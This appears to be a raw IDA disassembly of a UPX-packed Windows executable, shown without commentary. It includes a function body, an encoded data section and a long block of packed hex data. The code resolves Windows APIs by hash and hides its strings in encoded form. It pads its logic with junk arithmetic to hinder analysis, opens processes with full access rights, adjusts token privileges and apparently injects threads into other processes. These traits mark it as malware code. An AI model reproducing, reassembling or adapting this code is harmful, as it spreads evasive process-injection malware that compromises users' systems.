cmp esi, ebx
jz short loc_402AF0
push ebx
push esi
push offset sub_402806
call sub_402478
mov eax, dword_404104
add eax, 0FFFFFFC9h
add esp, 0Ch
cmp eax, 9Bh
ja short loc_402ADF
inc dword_404104
loc_402ADF: ; CODE XREF: sub_40298E+149�j
push 723EB0D5h
push 1
call sub_401115
pop ecx
pop ecx
push esi
call eax
loc_402AF0: ; CODE XREF: sub_40298E+AB�j
; sub_40298E+E9�j ...
xor eax, eax
jmp loc_402CF5
; ---------------------------------------------------------------------------
loc_402AF7: ; CODE XREF: sub_40298E+7F�j
; sub_40298E+90�j ...
push edi
xor edi, edi
inc edi
push edi
call sub_401115
pop ecx
pop ecx
push esi
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push ebx
call eax
push 0D89AD05h
push edi
call sub_401115
pop ecx
pop ecx
call eax
push 15h
mov esi, eax
pop eax
push 0FFFFFFF1h
pop ecx
loc_402B23: ; CODE XREF: sub_40298E+1AA�j
cmp ecx, 0B2h
ja short loc_402B2D
inc eax
inc ecx
loc_402B2D: ; CODE XREF: sub_40298E+19B�j
add eax, 0Bh
add ecx, 0Bh
cmp eax, 86h
jl short loc_402B23
push 80DBBE07h
push 6
mov dword_404104, eax
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+arg_4]
push ecx
push 20h
push esi
call eax
test eax, eax
mov esi, offset dword_404108
jz loc_402BFD
push 10h
push esi
push offset dword_403200
call sub_40102E
push 1B3D12B9h
push 6
call sub_401115
add esp, 14h
lea ecx, [ebp+var_8]
push ecx
push esi
push ebx
call eax
test eax, eax
jz short loc_402BFD
push 2
pop ecx
mov eax, ecx
xor edx, edx
loc_402B92: ; CODE XREF: sub_40298E+217�j
cmp edx, 0E8h
ja short loc_402B9C
inc eax
inc edx
loc_402B9C: ; CODE XREF: sub_40298E+20A�j
add eax, 26h
add edx, 26h
cmp eax, 75h
jl short loc_402B92
mov dword_404104, eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
push 7A2167DCh
mov [ebp+var_18], edi
mov edi, [ebp+arg_4]
push 6
mov [ebp+var_10], eax
mov [ebp+var_C], ecx
call sub_401115
pop ecx
pop ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_18]
push ecx
push ebx
push edi
call eax
mov edi, [ebp+arg_4]
push 723EB0D5h
push 1
call sub_401115
pop ecx
pop ecx
push edi
call eax
cmp dword_404104, 35h
jge short loc_402BFD
inc dword_404104
loc_402BFD: ; CODE XREF: sub_40298E+1CF�j
; sub_40298E+1FB�j ...
cmp dword_404104, 13h
jl short loc_402C0C
inc dword_404104
loc_402C0C: ; CODE XREF: sub_40298E+276�j
cmp dword_404104, 0F0h
jle short loc_402C22
mov dword_404104, 16h
loc_402C22: ; CODE XREF: sub_40298E+288�j
push 8
pop ecx
push 0Ch
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset aXsXXsx ; "ɕɸ"
rep stosd
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_401472
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_402CD5
cmp dword_404104, 12h
jl short loc_402C66
inc dword_404104
loc_402C66: ; CODE XREF: sub_40298E+2D0�j
cmp dword_404104, 0A3h
jle short loc_402C7C
mov dword_404104, 27h
loc_402C7C: ; CODE XREF: sub_40298E+2E2�j
push 99A4299Dh
push 1
call sub_401115
pop ecx
pop ecx
push esi
push ebx
push 1F0FFFh
call eax
mov esi, eax
cmp esi, ebx
jz short loc_402CD5
push ebx
push esi
push offset sub_402806
call sub_402478
mov eax, dword_404104
add eax, 0FFFFFFC9h
add esp, 0Ch
cmp eax, 9Bh
ja short loc_402CBD
inc dword_404104
loc_402CBD: ; CODE XREF: sub_40298E+327�j
push 723EB0D5h
push 1
call sub_401115
pop ecx
pop ecx
push esi
call eax
jmp short loc_402CD5
; ---------------------------------------------------------------------------
loc_402CD0: ; CODE XREF: sub_40298E+1E�j
call sub_401C08
loc_402CD5: ; CODE XREF: sub_40298E+2C7�j
; sub_40298E+309�j ...
cmp dword_404104, 45h
jge short loc_402CE4
inc dword_404104
loc_402CE4: ; CODE XREF: sub_40298E+34E�j
push 95902B19h
push 1
call sub_401115
pop ecx
pop ecx
push ebx
call eax
loc_402CF5: ; CODE XREF: sub_40298E+164�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_40298E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402D00 proc near ; CODE XREF: sub_401472+8�p
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_402D14: ; CODE XREF: sub_402D00+29�j
cmp ecx, eax
jb short loc_402D22
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_402D22: ; CODE XREF: sub_402D00+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_402D14
sub_402D00 endp
; ---------------------------------------------------------------------------
align 4
dd 0B5h dup(0)
dword_403000 dd 77E73167h ; DATA XREF: sub_401472+29E�r
; sub_401C08+13C�r ...
dword_403004 dd 77E76A2Eh ; DATA XREF: sub_401472+1ED�r
; sub_401472+26B�r ...
dword_403008 dd 77E74672h ; DATA XREF: sub_401472+16A�r
; sub_401472+1B6�r
dword_40300C dd 77E74155h ; DATA XREF: sub_401472+2BC�r
; sub_4017A4+8B�r ...
dd 0
dword_403014 dd 77D4C96Ah ; DATA XREF: sub_401C08+104�r
; sub_401C08+65A�r ...
dd 0
dword_40301C dd 0B195A1CDh, 0B8C8CCB1h, 0B1B191h ; DATA XREF: sub_401115+A1�o
dword_403028 dd 0B5B1C9D5h, 91B8B9BDh, 0B1B1h ; DATA XREF: sub_401115+92�o
dword_403034 dd 0A5B9A5DDh, 0B8D195B9h, 0B1B191h ; DATA XREF: sub_401115+83�o
; sub_401C08+14�o
dword_403040 dd 0C185CDC1h, 0B191B8A5h, 0B1h ; DATA XREF: sub_401115+74�o
dword_40304C dd 85D99185h, 0C8CCA5C1h, 0B1B191B8h, 0 ; DATA XREF: sub_401115+65�o
dword_40305C dd 0CDC995D9h, 0B8B9BDA5h, 0B1B191h ; DATA XREF: sub_401115+3F�o
dword_403068 dd 0F9h ; DATA XREF: sub_401472+2A7�o
dword_40306C dd 0A18DD9CDh, 0B8D1CDBDh, 95E195h ; DATA XREF: sub_401472+22A�o
dword_403078 dd 0C4C995D9h, 0E4h ; DATA XREF: sub_4017A4+76�o
dword_403080 dd 0F491A598h, 0 ; DATA XREF: sub_401C08+7AF�o
dword_403088 dd 91BD8D98h, 0F4C895h ; DATA XREF: sub_401C08+6ED�o
dword_403090 dd 0D594h ; DATA XREF: sub_401C08+645�o
dword_403094 dd 0B9A5C9D5h, 0C1D591D9h, 0A1C1B8D1h, 9185FCC1h, 9185F4D9h
; DATA XREF: sub_401C08+605�o
dd 0D4CCDCD9h, 91BD8D98h, 0F4C495h
dword_4030B4 dd 0E1C1E1B9h, 91h ; DATA XREF: sub_401C08+56E�o
dword_4030BC dd 89D1D199h, 95A989D1h, 0A1C1B895h, 0C1h ; DATA XREF: sub_401C08+4FF�o
dword_4030CC dd 0A5CDC9D5h, 0B89999A5h, 0C1A1C1h ; DATA XREF: sub_401C08+493�o
dword_4030D8 dd 8DAD9DA9h, 0C1B8B5C1h, 0C1A1h ; DATA XREF: sub_401C08+427�o
dword_4030E4 dd 0B9DD99A5h, 0C1B8A1E1h, 0C1A1h ; DATA XREF: sub_401C08+3BB�o
dword_4030F0 dd 0E585D5A5h, 9D9999A5h, 0C1A1C1B8h, 0 ; DATA XREF: sub_401C08+34F�o
dword_403100 dd 85A1BD95h, 0E189h ; DATA XREF: sub_401C08+2F5�o
dword_403108 dd 0E88Dh ; DATA XREF: sub_401C08+2B3�o
; sub_401C08+37E�o ...
dword_40310C dd 0A5C9B9E9h, 0A1C1B88Dh, 9185FCC1h, 9185F4D9h, 0D4CCDCD9h
; DATA XREF: sub_401C08+281�o
dd 0
dword_403124 dd 71E88Dh ; DATA XREF: sub_401C08+24A�o
; sub_401C08+5B9�o
aBSXaASeeIesAEA db '輼坹Ցɽͼɹ',0 ; DATA XREF: sub_401C08+230�o
align 10h
aBSXaxxXxBnAEAs db '輼ŕɽͼɹ',0 ; DATA XREF: sub_401C08+226�o
align 4
aQNnXxsXsx db 'qэٵ噸',0 ; DATA XREF: sub_401C08+1D4�o
align 4
aQxiXsx db 'qѽŽ',0 ; DATA XREF: sub_401C08+1BA�o
align 4
aQXsx db 'qŹ',0 ; DATA XREF: sub_401C08+1A0�o
align 4
aQXBXsx db 'qՕݡ',0 ; DATA XREF: sub_401C08+186�o
align 4
aQnNXsx db 'qэ',0 ; DATA XREF: sub_401C08+16C�o
align 10h
aQNBXsx db 'qŭ',0 ; DATA XREF: sub_401C08+152�o
align 4
aQiSSnXsx db 'q᭸',0 ; DATA XREF: sub_401C08+12D�o
align 4
aFs db '',0 ; DATA XREF: sub_401C08+F2�o
align 10h
aSq db 0Dh,'q',0 ; DATA XREF: sub_401C08+C4�o
aNxXS db 'ɹȸ',0 ; DATA XREF: sub_401C08+4F�o
align 4
aXS db '͕ȸ',0 ; DATA XREF: sub_401C08+34�o
align 10h
dword_403200 dd 9511954Dh, 419DD589h, 0A5D9A5C9h, 959D95B1h, 0
; DATA XREF: sub_40298E+1D8�o
dword_403214 dd 0B191D1B9h, 0B191B8B1h, 0B1h ; DATA XREF: sub_402478+107�o
a95eYexSmxnE db '95Y=Mѥ',0 ; DATA XREF: sub_402478+EC�o
align 4
aQNbXsx db 'qٍѸ',0 ; DATA XREF: sub_402806+8C�o
align 4
aXsXXsx db 'ɕɸ',0 ; DATA XREF: sub_40298E+C1�o
; sub_40298E+29F�o
align 4
dd 36Bh dup(0)
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402420+F�o
; sub_40298E+176�o
align 4
dd 3Ah dup(0)
dword_404104 dd 0B0h ; DATA XREF: sub_401115+4�r
; sub_401115+D�w ...
dword_404108 dd 6C64746Eh, 6C642E6Ch, 6Ch, 3Dh dup(0) ; DATA XREF: sub_401115+39�o
; sub_401115+5F�o ...
byte_404208 db 1 ; DATA XREF: sub_4012F6+2A�r
; sub_4012F6+69�w
byte_404209 db 1 ; DATA XREF: sub_4012F6:loc_401317�r
; sub_4012F6+38�w
align 4
dword_40420C dd 0 ; DATA XREF: sub_402806+103�o
; sub_402806+123�r
dword_404210 dd 0 ; DATA XREF: sub_402806+11D�r
; sub_402806+13A�r
align 2000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 406000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_406000 dd 58h, 2000h, 74736C01h, 79706372h, 6C010041h, 63727473h
; DATA XREF: start+1�o
dd 4169706Dh, 736C0100h, 656C7274h, 100416Eh, 7274736Ch
dd 41746163h, 650000h, 20140000h, 77010000h, 69727073h
dd 4166746Eh, 0
dd 1FF00000h, 62B0901h, 6090620h, 6090609h, 0F0D0609h
dd 11231E11h, 0E26621Ch, 8061912h, 8052B0Fh, 9310C0Dh
dd 940102Fh, 92C0C06h, 0B780C06h, 290C6525h, 3C0E294Ch
dd 20133D05h, 19361608h, 344A0D0Bh, 11051606h, 0C511041h
dd 11707962h, 10291055h, 0C060959h, 2006753Fh, 609191Bh
dd 2905410Ch, 0B052813h, 1A1A1A15h, 0E441A1Ah, 32371A0Ah
dd 3D2F5A42h, 3A323A32h, 3A353A32h, 810344Bh, 16080C2Ch
dd 2C381545h, 101A190Ch, 13392E19h, 61B652Ch, 4E1A220Ch
dd 1306070Ch, 60C3408h, 4F0C370Ch, 4B5A6145h, 2F102912h
dd 6381E0Eh, 12272816h, 1205061Bh, 88093C36h, 916150Bh
dd 0A280C06h, 173D2A13h, 948410Eh, 0C060906h, 9161514h
dd 0A280C06h, 91E13h, 4550h, 4014Ch, 46727C08h, 2 dup(0)
dd 10200E0h, 8010Bh, 1E00h, 0C00h, 0
dd 298Eh, 1000h, 3000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 6000h, 400h, 0
dd 4000002h, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3254h, 3Ch, 6 dup(0)
dd 5000h, 1D0h, 0Ch dup(0)
dd 3000h, 1Ch, 6 dup(0)
dd 7865742Eh, 74h, 1D2Bh, 1000h, 1E00h, 400h, 3 dup(0)
dd 60000020h, 6164722Eh, 6174h, 302h, 3000h, 400h, 2200h
dd 3 dup(0)
dd 40000040h, 7461642Eh, 61h, 21Ch, 4000h, 5 dup(0)
dd 0C0000040h, 6C65722Eh, 636Fh, 212h, 5000h, 400h, 2600h
dd 3 dup(0)
dd 42000040h, 5000h, 32ACh, 504Ah, 512C00h, 0DE815900h
dd 0A56F8D3Dh, 56531887h, 87DE84Dh, 68615700h, 0A09BFB04h
dd 0A4299DBFh, 5C565799h, 0DF8CE4F6h, 8B39F051h, 74DB85D8h
dd 6F259639h, 683FB0FEh, 0FDC94385h, 0FC4D8D28h, 0FC7D5351h
dd 0B62D4268h, 6FA8EC3Bh, 1357169Eh, 0E8EF4FEBh, 0E661B03Dh
dd 0E6CD3DE0h, 0DD006A63h, 64CCDAC1h, 6A166A38h, 0D8683BFFh
dd 0D5F61BE1h, 28723EB0h, 876E034Bh, 0E4167080h, 0F2D37C02h
dd 0C8D2C26Ch, 0FF391ECCh, 0B390025Bh, 18B83C23h, 0FC1C3A13h
dd 982F0D46h, 25EEB901h, 0E868571Eh, 0E9372C42h, 48774393h
dd 973804Ah, 0E8E66BBFh, 9BA1B6FCh, 6A8AC490h, 61110605h
dd 51F43B64h, 95EC1021h, 0A172FE36h, 29157D7h, 6A583C6Ah
dd 0E0145937h, 31C2C6B7h, 0E41405Bh, 0F8025E2Bh, 0F76FEE6Eh
dd 0B1EB7CC7h, 51F445F7h, 0F77A3FFh, 0DB306586h, 0BFA76FBFh
dd 8DFCED6Dh, 8B4A9D9Ch, 49F68533h, 6C236333h, 0E8488D37h
dd 4049D246h, 0C97682Fh, 0A0B20EC9h, 410A3CFh, 0BDE97EDCh
dd 9AAB9B00h, 0E8858DF8h, 505641FEh, 93B6EFBh, 4AF87533h
dd 0C9680CD0h, 0BC189F16h, 1B6DB5Ah, 504D2ECh, 8020B6F0h
dd 0B9CEE19Ch, 0D63324ABh, 0A5FDE109h, 9168F009h, 39E4FB21h
dd 0C63B6714h, 3C56FE9Ah, 820828Bh, 37B15078h, 0D6FFDF77h
dd 80235F4Bh, 0F3AE9BDh, 7F0C5285h, 0EA9A5BD8h, 2A3D455Ch
dd 1EBF08Bh, 0E3B7B74Eh, 35BC80EFh, 0F5755C0Eh, 4B15FF1Dh
dd 0CB4A7E42h, 6AC2CD24h, 94ED442Ah, 11EF2424h, 0B13DD3DCh
dd 0E29E99Fh, 6435848Dh, 0B1BB726Eh, 79043650h, 0EC1FE585h
dd 0BA85848Bh, 491D7697h, 0BE9B075Eh, 4940D06Ah, 97915BAEh
dd 3D0A0A49h, 0FF57EAC7h, 0E55F6204h, 74C4E6Ch, 6A8A94F7h
dd 85D82107h, 51E82321h, 999B27EEh, 83C1DB91h, 7DC8FC00h
dd 27B23F77h, 90576B74h, 33FF5874h, 596B0349h, 66F90C6Dh
dd 28FD322Bh, 3CD60701h, 0AC687C8Ch, 0C1D572Ah, 0F8497399h
dd 0E4E9ED68h, 1A83EB20h, 1648458Ah, 881DF463h, 231AB81Dh
dd 0EF968B7Bh, 0A4F8399Eh, 0FA64BDDh, 0EB33A782h, 13F89405h
dd 0C642907Ch, 0D33D45C1h, 0BFC631FAh, 7CA8D6E9h, 136A0808h
dd 6ADB3358h, 929189DDh, 2B7F68Eh, 0E045C7ECh, 0CF1407D0h
dd 9654A0B0h, 6C101065h, 0D6237232h, 567F29D1h, 0F7847B56h
dd 0C9FFE10Bh, 0D4816853h, 36A0534h, 49E87589h, 7AF1A310h
dd 0F5503E22h, 8C80E495h, 0F7847800h, 836DB586h, 7F699E4Bh
dd 6E4CE487h, 0B637ED48h, 3DD7685Fh, 0F03959h, 661FE96Ch
dd 0BD661556h, 757B87Dh, 0D4CB1CF4h, 7556047Eh, 9D1D1BF4h
dd 7901FB0h, 68843D9Fh, 1AD09C78h, 65B1604Dh, 0E01957E9h
dd 29183002h, 60C8472h, 0FC343F05h, 68A03901h, 2F5CE027h
dd 0A7894657h, 2E0AC303h, 0A1804093h, 68BA93FDh, 45422021h
dd 0FF888DECh, 5864C2FBh, 0DE70BEBAh, 870F4F8Fh, 59460136h
dd 2659654Eh, 26D17669h, 86C76626h, 1468F851h, 0FC08F8F1h
dd 806855B4h, 7015A15Bh, 51BB8427h, 0C34E4056h, 560C2CB6h
dd 0FB94F0F2h, 1827DA10h, 296297CCh, 0FC96BB21h, 8D96C34Eh
dd 8CFB4056h, 0D672496Ah, 79B76B7Fh, 0C1950F22h, 0A4FA815Ah
dd 58FE42C3h, 831DF91Bh, 49391DC2h, 3A6E7678h, 976574CBh
dd 6C9BED6Dh, 3FD1C368h, 0DC6C8D0Fh, 730DD8E1h, 0DC4B7593h
dd 888BF055h, 85BD846Dh, 86889685h, 73B08816h, 97776D83h
dd 0BD80CB7h, 0A3590349h, 0BFF66502h, 13EBB6FBh, 0FE3DFEA8h
dd 88092403h, 4EB105Dh, 2874C33Ah, 1604CF6Ch, 0C065266Ch
dd 3C81FDD4h, 3DB31D18h, 14FB0CA5h, 84335773h, 1166206Ch
dd 309838F6h, 3DBD0790h, 859EA396h, 0F9E4252h, 3680019Fh
dd 6847E1E4h, 0AEF7CBF1h, 34C4F038h, 0D72CC25Bh, 2172DA4Fh
dd 0E4D5B067h, 4BF50CC6h, 18035FFCh, 3BEC55FDh, 0F74DC55h
dd 6BB0E4E8h, 7D05F0ABh, 0B2043809h, 2C6AACCCh, 0BA502C93h
dd 0E8590AD3h, 8417AD07h, 172F2293h, 42C08C3Dh, 0BAEF183Bh
dd 51F20418h, 8149743Ah, 2ADD96C2h, 77FACFFCh, 8D406A3Bh
dd 12C28845h, 46584484h, 0C935C13Fh, 46318AC7h, 0A958B97Bh
dd 84C8DBD9h, 0B0E500E1h, 0EA3351BEh, 8303714Ch, 0E63FFC8h
dd 0B8F1228Ch, 34C76C03h, 467A3096h, 0B3C857BFh, 0BF22C864h
dd 1AF4211Fh, 116720Ch, 1136E464h, 172033FAh, 3811149Dh
dd 86D47A81h, 1E7E945h, 182E3988h, 2DE72836h, 0BA2C791Eh
dd 84E5E759h, 2764EB85h, 0A13D3131h, 85630603h, 0E074C1ECh
dd 8F6B972Fh, 0ECDEECB7h, 0FEF67D67h, 42C2A205h, 0DC02E464h
dd 0B63DD80Ch, 0B8EB3B44h, 2A14DC56h, 0BC65248Dh, 0E6C1D24Ch
dd 1919B798h, 2F07A53Dh, 0CCDD9B3Bh, 333D8B68h, 81A5CF52h
dd 0FE485625h, 6721D5D7h, 0C024B1B1h, 0C858191Fh, 0B4320360h
dd 230C3368h, 0A4C80C83h, 60980A78h, 88203213h, 8C801988h
dd 0D98320Ch, 0FC5BC678h, 8166A8C9h, 0E019DC7Dh, 29060B84h
dd 713EC789h, 5FE3C8Eh, 84F2020Ch, 70BC0E1Ah, 9530777h
dd 7E596E04h, 0EF1D8BE0h, 350B8563h, 0A7531B1h, 1C505115h
dd 0EBA5B190h, 2875253Ch, 81C8FC48h, 19039D8Ch, 0EC16FD24h
dd 506186B0h, 362FD30Ch, 0E4E46405h, 0C14FEB8h, 9D0AF65Bh
dd 34DED319h, 1B0D212Bh, 0A007B304h, 0C23108C0h, 259D8285h
dd 757ADE56h, 9190715Ah, 6736C81h, 40B07400h, 0E9BD0106h
dd 0BB99173Eh, 591D3511h, 0E0F0200Ch, 0CA408586h, 25B6485Eh
dd 6B183683h, 19021B88h, 1E40AB9h, 7601C863h, 986B6E5Eh
dd 1C80172h, 0C80168D8h, 0CC0B45C8h, 719173E4h, 200D0978h
dd 0D95C81BCh, 200C6E0Ah, 0A8C91723h, 92E0B405h, 6B03436Bh
dd 127FA324h, 0DA6F70EDh, 289E068h, 4F6C8C0Fh, 19041489h
dd 6E244224h, 0C95FA916h, 1F6A09D8h, 0E2689496h, 960E4218h
dd 0EF2701D1h, 86BB5048h, 10DA1C80h, 57903FBFh, 620B702Ch
dd 50D04640h, 1BFFF855h, 0A8A876Eh, 80951D04h, 8800F97Dh
dd 675ED45h, 5BDB68C6h, 30EF45EBh, 4F91649h, 3CEF0F13h
dd 1669265Eh, 25F1FC71h, 0BAB23D25h, 594DB025h, 0D2596D57h
dd 692F919Ah, 1704FCFCh, 5B6CECFDh, 0FDEE791Eh, 29EE1904h
dd 0AC64F8ECh, 0F01836E1h, 0E7076400h, 5817B588h, 8B66E2A0h
dd 6DFE100Bh, 0E48487DBh, 0E66AE575h, 88037430h, 856AE665h
dd 0C47BA4ADh, 77428E3Dh, 419646CBh, 0E7FC42BAh, 7919E4E4h
dd 0E4C1D92Eh, 8B8004E8h, 0F52B0E04h, 0DDB0113Ah, 36B48F60h
dd 4B929D3Dh, 6E2FD982h, 902B1968h, 6FADFD95h, 0A86FC487h
dd 0F0F0DFBFh, 2BBEC581h, 0FFEB0030h, 32FC9226h, 97812C68h
dd 2F8D612h, 0F5682674h, 0C0749972h, 0A33D8249h, 57FE03E8h
dd 124A1F8Bh, 0C574D113h, 0B193745Fh, 0C25E7168h, 7C106FB2h
dd 207D5C09h, 4860ED0Dh, 0F4C8033Ch, 2359A1BFh, 418DE865h
dd 38708B18h, 2EDC4D89h, 8832362Ch, 0B835E492h, 48FCE8D8h
dd 0A08B638Ch, 9959FF5Eh, 9BE2C1Ah, 0E8C05BC1h, 0DFF7FF6Fh
dd 0E783FF1Bh, 83FDF93Ch, 0E63D04C7h, 97A99B0Eh, 0A25B7FCh
dd 0AA5356EFh, 537FD089h, 0C33BD5DCh, 32077596h, 68FD17DAh
dd 5CD9430h, 65B55F67h, 0F8890024h, 19C8EC25h, 8C4A12E5h
dd 4BD12902h, 121D0938h, 0AC202247h, 0C060C576h, 965BC45h
dd 1914222Ah, 6840BFB7h, 1FC0EAEEh, 90F08B11h, 3A12625Ah
dd 24251BCh
dd 19CF49Ch, 0AD6E30B9h, 0A859C415h, 1C9302Bh, 2D8DE0F3h
dd 0F4143218h, 56B7E045h, 0B05B7CC0h, 0EC24E81Dh, 1428E895h
dd 0AE5FB190h, 0E8E5746Ah, 14489DDFh, 6AF04D03h, 0B871A048h
dd 932CB2E0h, 8B703131h, 0F0DD8E7Dh, 8B2B075Fh, 0C62B5AC7h
dd 58A31C6Ah, 4223C13Dh, 5BA17640h, 262C20DBh, 9868FA02h
dd 0E34E1589h, 413E25FFh, 9AC60334h, 75BE8D38h, 6788109h
dd 0B09078Bh, 68DFEDDBh, 8BED7D03h, 41030240h, 0DEB1A0Ch
dd 0F80F082Fh, 1EBFFDDh, 18396640h, 4040FA75h, 728DEF05h
dd 0FFE81B5h, 0D83B6D52h, 49444207h, 28ECB70Ch, 0AEFFFB0Fh
dd 0FC3154FEh, 0E640088Ah, 0F0F9802Ah, 0B60F0773h, 0EBD103C9h
dd 6DBBB00Fh, 83387FEDh, 0E1C10FE1h, 0ECF0B10h, 1BB8B44h
dd 0B349260Ah, 0D9751DF5h, 0E5632DA9h, 0DB2F58A9h, 0C7131332h
dd 0E87D2B65h, 6FF8CB60h, 87D03F5h, 54751070h, 1874B368h
dd 248D13E6h, 153995Dh, 8EB6540Ch, 4A630182h, 4CD15610h
dd 97839D52h, 2AC18B5Ah, 0BC97FE2Bh, 0EBC73D2Ah, 0E02F685Bh
dd 3B6AAA1Dh, 606B4564h, 3D028BF0h, 5F2B673Bh, 10F210B9h
dd 520C823h, 0BD89F2B0h, 0BD1FFDA0h, 0DB78C9F4h, 717DB4A8h
dd 0CD9567C2h, 0B0A5B77h, 3A836896h, 3682CBEh, 0FBAB3DC6h
dd 4F61448Ah, 4C98E6AEh, 0C708E80Bh, 0C1732643h, 79635390h
dd 0C6FF0AEh, 0BC3C765Bh, 6FB89AF0h, 0B53FF33h, 4149201Ah
dd 253957C3h, 14B6B063h, 53860620h, 0C988F8C0h, 374A98FEh
dd 45A49A1h, 25EBB4B1h, 17378451h, 0FFDA3422h, 1E01782Ch
dd 5E3A6A77h, 0C658D86Ah, 0FC70D972h, 1EC64662h, 37A0211Eh
dd 6486C3C0h, 57BC00EBh, 21B8950h, 0C7757814h, 0B6440606h
dd 239B302Dh, 1866A9F4h, 0CC03B2E8h, 77DBADEh, 8C212646h
dd 502DB301h, 0B8BF0CA9h, 60BAED5Fh, 9757035Bh, 322CFFC5h
dd 4D3E6510h, 0F20C058Ch, 3874140Ch, 2A36C7ECh, 681C8B16h
dd 7B88BF3Bh, 0B64E5649h, 6213E97Ah, 0A75E5903h, 0F188296Eh
dd 3D295E47h, 0A26068A6h, 1353768Ah, 0CB030502h, 15851443h
dd 1E674C21h, 0C4F8013Ch, 442B5631h, 9696FC6Ah, 0D21D676Dh
dd 31EE549h, 0BFA71EFFh, 3012E1Dh, 53BE6519h, 0B3886D6Fh
dd 33CD8D3Ch, 1574A2C9h, 0C52FFA8Dh, 0C50D94EEh, 0CD7A8010h
dd 0FC558903h, 75C83B41h, 50BEED2Fh, 118BACBCh, 0B0020B8h
dd 7865DDD0h, 6BF7F970h, 0E4066CABh, 10045138h, 7265726Fh
dd 67F1B6DBh, 0B0849D3h, 222EDCC8h, 51C21065h, 0C714FB66h
dd 0B109480Ch, 0A105ADC3h, 75C1B724h, 2FBCC87Dh, 44F580C8h
dd 0C8ECABF3h, 237ECE09h, 3B0E5656h, 777459F3h, 19912C6h
dd 0A3C3B0B9h, 17F1CF27h, 68535502h, 8C1F0FFFh, 86C88342h
dd 233574C2h, 0D606188Dh, 6790148h, 8D089BC9h, 9958650Fh
dd 0E6F11CAAh, 0EC383D07h, 155747FFh, 0A1E8D468h, 57B0C35h
dd 150D89ADh, 0C66715C4h, 69A49979h, 0BB2D6F1h, 58863D0Bh
dd 681FAB42h, 80DBBE07h, 2110C944h, 0CFEFF06h, 0E8206A51h
dd 0B40B2313h, 0E655B0A8h, 4930010h, 12B927EDh, 95351B3Dh
dd 48B7F0F8h, 19D651B4h, 8B5902A6h, 2CD233C1h, 79B118CDh
dd 0C24257E8h, 11703875h, 5F65DE6Bh, 7A5ADB6Dh, 67DCD743h
dd 0E8757A21h, 624A0CD4h, 1B44F149h, 0CC2D564Dh, 53CD9A39h
dd 27FD1C53h, 13C3390Ch, 1383353Bh, 21720308h, 2AE216F0h
dd 0DD610A19h, 209A267Eh, 0CEB3C99h, 0D9C862C0h, 45E6040Ch
dd 77FFF1D9h, 0CC29Fh, 8D5100CCh, 2B04244Ch, 0F7C01BC8h
dd 8BC823D0h, 0A970BDC4h, 1CF0856Ch, 59890A72h, 0A2E88B94h
dd 0C336AADh, 51854A2Dh, 0F4B47761h, 2B1D37h, 0FF6FF600h
dd 95A1CD07h, 0C8CCB1B1h, 591B8h, 0B5B1C9D5h, 0D90AB9BDh
dd 3EDD8Fh, 1B9A5DDh, 0C10CD195h, 0A5C185CDh, 0DCC17716h
dd 0D99124A5h, 0D900300Ch, 7EDEC995h, 0A5CDD837h, 0CD0FF934h
dd 0BDA18DD9h, 0E19537CDh, 0DE7FFE95h, 0E4C41BFDh, 91A5986Bh
dd 0BD8D98F4h, 0F4C89591h, 0D59400h, 66FB7DD7h, 0D591D95Eh
dd 0A1C129C1h, 0F455FCC1h, 32E85B03h, 0D4CCDC76h, 0E1B9C423h
dd 0BB3391E2h, 99BDBDEEh, 189D1D1h, 279595A9h, 0A56ED50Fh
dd 0FD9B6D99h, 0A90D99B1h, 0C18DAD9Dh, 0DD1318B5h, 7BAC1F32h
dd 0D50BA1B0h, 9D23E585h, 0BD950032h, 1B036DA1h, 6B8985C0h
dd 0B9E9748Dh, 17B7B778h, 23738DB2h, 0A100711Bh, 0FFE8C16Bh
dd 0BCFDBDBFh, 0B99DE5BCh, 91D5979Dh, 0A589F385h, 0C9C1BCE9h
dd 0BCCD9DBDh, 7FC9CDA5h, 156B7732h, 2BBC9D12h, 0C5E5E527h
dd 0B695C5D1h, 0E5FB007Fh, 0ADA1B8C1h, 0D1710026h, 0B5D9AD8Dh
dd 0D9BB9924h, 0F0D1DFFh, 0D1B9A995h, 0EBDC5BDh, 0B6BDB90Fh
dd 0B1EF77E4h, 1B0DB9C5h, 95D5B9B1h, 3FD9A1DDh, 3DB587ECh
dd 0B9ADC537h, 0D5A90BA1h, 0B342DDE1h, 0E1C9EC3Dh, 919427ADh
dd 6BAD0DBBh, 850861EDh, 0CD27C8AEh, 0FFB7EC10h, 954D0D61h
dd 0D5899511h, 0D9F9419Dh, 9D95B1A5h, 0E083CB37h, 0D31A885Ah
dd 5935D139h, 0B76E19C1h, 993D7EA5h, 0CED18D2Ah, 17B5C867h
dd 8F43030Eh, 53C9BDB1h, 0E042A20Ch, 19001F0Fh, 22D32510h
dd 82029Bh, 2E797F09h, 1205820h, 7274736Ch, 1F67C863h
dd 417970E4h, 4169706Dh, 6E656C14h, 7DB34FFEh, 31417461h
dd 73771465h, 6E697270h, 0C83F6674h, 113E7FFh, 9011FF0h
